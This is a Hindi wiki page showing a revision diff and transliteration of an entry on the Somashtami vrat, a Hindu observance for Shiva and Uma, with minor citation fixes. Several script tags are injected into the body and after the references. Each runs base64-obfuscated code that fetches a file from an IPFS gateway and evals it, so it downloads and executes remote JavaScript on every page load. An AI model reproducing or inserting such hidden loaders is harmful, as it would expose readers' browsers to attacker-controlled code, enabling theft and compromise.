Difference between revisions of "सोमाष्टमी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "ref> (" to "ref>")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*तिथिव्रत यह देवता [[शिव]] एवं [[उमा]] का व्रत है।
 
*तिथिव्रत यह देवता [[शिव]] एवं [[उमा]] का व्रत है।
 
*सोमवारयुक्त [[नवमी]] पर रात्रि में शिव एवं उमा की पूजा करनी चाहिए।  
 
*सोमवारयुक्त [[नवमी]] पर रात्रि में शिव एवं उमा की पूजा करनी चाहिए।  
Line 6: Line 6:
 
*प्रतिमा के दक्षिण भाग में चन्दन एवं कर्पूर का तथा वाम भाग में कुंकुम एवं तुरुष्क (लोबान) का प्रयोग करना चाहिए।
 
*प्रतिमा के दक्षिण भाग में चन्दन एवं कर्पूर का तथा वाम भाग में कुंकुम एवं तुरुष्क (लोबान) का प्रयोग करना चाहिए।
 
*देवी के सिर पर नीलम तथा शिव के सिर पर मोती रखे जाते हैं और श्वेत एवं लाल पुष्पों से पूजा की जाती है।
 
*देवी के सिर पर नीलम तथा शिव के सिर पर मोती रखे जाते हैं और श्वेत एवं लाल पुष्पों से पूजा की जाती है।
*सद्योजात नाम के साथ तिल का होम करना चाहिए।<ref> हेमाद्रि (व्रतखण्ड 1, 833-835, [[स्कन्दपुराण]] से उद्धरण)</ref>  
+
*सद्योजात नाम के साथ तिल का होम करना चाहिए।<ref> हेमाद्रि (व्रतखण्ड 1, 833-835, [[स्कन्दपुराण]] से उद्धरण</ref>  
*भविष्योत्तरपुराण<ref> (भविष्योत्तरपुराण 59|1-23)</ref> ने इन्हीं शब्दों में इस व्रत का उल्लेख किया है।
+
*भविष्योत्तरपुराण<ref>भविष्योत्तरपुराण 59|1-23</ref> ने इन्हीं शब्दों में इस व्रत का उल्लेख किया है।
*[[वामदेव]], [[सद्योजात]], [[अघोर]], [[तत्पुरुष]], [[ईशान]] शिव के पाँच मुख कहे जाते हैं।<ref>तैत्तिरीयारण्यक (90|43-47)</ref>
+
*[[वामदेव]], [[सद्योजात]], [[अघोर]], [[तत्पुरुष]], [[ईशान]] शिव के पाँच मुख कहे जाते हैं।<ref>तैत्तिरीयारण्यक (90|43-47</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 14:13, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • tithivrat yah devata shiv evan uma ka vrat hai.
  • somavarayukt navami par ratri mean shiv evan uma ki pooja karani chahie.
  • panchagavy se pratima ka snan karana chahie.
  • vamadev tatha any namoan se shiv ki pooja karani chahie.
  • pratima ke dakshin bhag mean chandan evan karpoor ka tatha vam bhag mean kuankum evan turushk (loban) ka prayog karana chahie.
  • devi ke sir par nilam tatha shiv ke sir par moti rakhe jate haian aur shvet evan lal pushpoan se pooja ki jati hai.
  • sadyojat nam ke sath til ka hom karana chahie.[1]
  • bhavishyottarapuran[2] ne inhian shabdoan mean is vrat ka ullekh kiya hai.
  • vamadev, sadyojat, aghor, tatpurush, eeshan shiv ke paanch mukh kahe jate haian.[3]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 833-835, skandapuran se uddharan
  2. bhavishyottarapuran 59|1-23
  3. taittiriyaranyak (90|43-47

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>